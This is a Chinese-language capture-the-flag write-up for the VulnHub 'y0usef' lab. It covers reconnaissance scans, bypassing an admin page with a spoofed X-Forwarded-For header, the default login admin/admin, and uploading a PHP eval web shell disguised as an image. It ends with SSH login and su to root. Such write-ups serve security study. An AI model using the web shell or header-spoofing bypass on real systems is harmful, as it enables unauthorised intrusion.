)
免责声明:本文记录的是 y0usef 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。
环境: https://download.vulnhub.com/y0usef/y0usef.ova
一、信息收集
1、主机发现
nmap扫描需要处于同一个网段
arp-scan -l
┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:ce:48:4f PCS Systemtechnik GmbH 192.168.5.13 08:00:27:58:85:88 PCS Systemtechnik GmbH 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.971 seconds (129.88 hosts/sec). 3 responded
IP:192.168.5.13
2、扫描端口
nmap -sV -p- -A 192.168.5.13
┌──(root㉿kali)-[~] └─# nmap -sV -p- -A 192.168.5.13 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-20 07:18 -0500 Nmap scan report for 192.168.5.13 Host is up (0.00017s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA) | 2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA) | 256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA) |_ 256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Ubuntu)) |_http-server-header: Apache/2.4.10 (Ubuntu) |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:58:85:88 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.17 ms 192.168.5.13 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
开放端口:22、80
3、扫描目录
dirsearch -u http://192.168.5.13
┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.13 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.5.13/_26-02-20_07-19-43.txt Target: http://192.168.5.13/ [07:19:43] Starting: [07:19:45] 403 - 298B - /.ht_wsr.txt [07:19:45] 403 - 301B - /.htaccess.orig [07:19:45] 403 - 301B - /.htaccess.bak1 [07:19:45] 403 - 303B - /.htaccess.sample [07:19:45] 403 - 301B - /.htaccess.save [07:19:45] 403 - 302B - /.htaccess_extra [07:19:45] 403 - 299B - /.htaccess_sc [07:19:45] 403 - 299B - /.htaccessBAK [07:19:45] 403 - 301B - /.htaccess_orig [07:19:45] 403 - 299B - /.htaccessOLD [07:19:45] 403 - 300B - /.htaccessOLD2 [07:19:45] 403 - 291B - /.htm [07:19:45] 403 - 292B - /.html [07:19:45] 403 - 301B - /.htpasswd_test [07:19:45] 403 - 298B - /.httr-oauth [07:19:45] 403 - 297B - /.htpasswds [07:19:45] 403 - 291B - /.php [07:19:45] 403 - 292B - /.php3 [07:19:52] 301 - 320B - /adminstration -> http://192.168.5.13/adminstration/ [07:20:13] 403 - 301B - /server-status/ [07:20:13] 403 - 300B - /server-status Task Completed
dirb http://192.168.5.13 -X .php,.txt,.zip,.html
┌──(root㉿kali)-[~] └─# dirb http://192.168.5.13 -X .php,.txt,.zip,.html ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Feb 20 07:20:38 2026 URL_BASE: http://192.168.5.13/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt EXTENSIONS_LIST: (.php,.txt,.zip,.html) | (.php)(.txt)(.zip)(.html) [NUM = 4] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.5.13/ ---- + http://192.168.5.13/index.php (CODE:200|SIZE:791) ----------------- END_TIME: Fri Feb 20 07:20:42 2026 DOWNLOADED: 18448 - FOUND: 1
4、框架检测
whatweb http://192.168.5.13
┌──(root㉿kali)-[~] └─# whatweb http://192.168.5.13 http://192.168.5.13 [200 OK] Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.5.13], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]
二、漏洞利用
操作1~3每一次操作都需要抓包,添加本地头,不然无法访问。
1、访问/adminstration
burp抓包,添加X-Forwarded-For:127.0.0.1,让服务器以为这是从本地代理发送的请求,然后放掉。
2、burp密码破解
burp抓包,添加X-Forwarded-For:127.0.0.1,在破解密码。
admin/admin
登录成功
3、文件上传
<?php @eval($_REQUEST['cmd']); ?>
POST /adminstration/upload/ HTTP/1.1 Host: 192.168.5.13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------58956059210588723155013980 Content-Length: 371 Origin: http://192.168.5.13 Connection: keep-alive Referer: http://192.168.5.13/adminstration/upload/ Cookie: PHPSESSID=b4osh7tug1b8a383j3r0ovj532 Upgrade-Insecure-Requests: 1 -----------------------------58956059210588723155013980 Content-Disposition: form-data; name="document"; filename="cmd.php" Content-Type: image/jpg <?php @eval($_REQUEST['cmd']); ?> -----------------------------58956059210588723155013980 Content-Disposition: form-data; name="submit" Send -----------------------------58956059210588723155013980--
上传成功
http://192.168.5.13/adminstration/upload/files/1771591543cmd.php
4、进入home文件夹发现一串加密代码
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=
base64解码后
ssh : user : yousef pass : yousef123
5、ssh登录
ssh yousef@192.168.5.13 yousef123 id
┌──(root㉿kali)-[~] └─# ssh yousef@192.168.5.13 The authenticity of host '192.168.5.13 (192.168.5.13)' can't be established. ED25519 key fingerprint is: SHA256:J3OrMiuy5X+zdlTAYCltBBCNaN3bxTjPbQvtPR6QSzE This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.5.13' (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html yousef@192.168.5.13's password: Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686) * Documentation: https://help.ubuntu.com/ 778 packages can be updated. 482 updates are security updates. Last login: Tue Dec 8 01:58:33 2020 from s yousef@yousef-VirtualBox:~$ yousef@yousef-VirtualBox:~$ id uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) yousef@yousef-VirtualBox:~$
三、权限提升
1、本地提权
id一下发现该用户具有sudo权限
uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
直接进入
su root yousef123 cd id ls cat root.txt
yousef@yousef-VirtualBox:~$ su root Password: root@yousef-VirtualBox:/home/yousef# cd root@yousef-VirtualBox:~# id uid=0(root) gid=0(root) groups=0(root) root@yousef-VirtualBox:~# root@yousef-VirtualBox:~# ls root.txt root@yousef-VirtualBox:~# root@yousef-VirtualBox:~# cat root.txt WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx root@yousef-VirtualBox:~#
2、base64解码
You've got the root Congratulations any feedback content me twitter @y0usef_11
本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路,始于合规,终于责任。
:覆盖GDPR/CCPA/等保2.0三级要求,附可审计Terraform模块+自动检测脚本)
)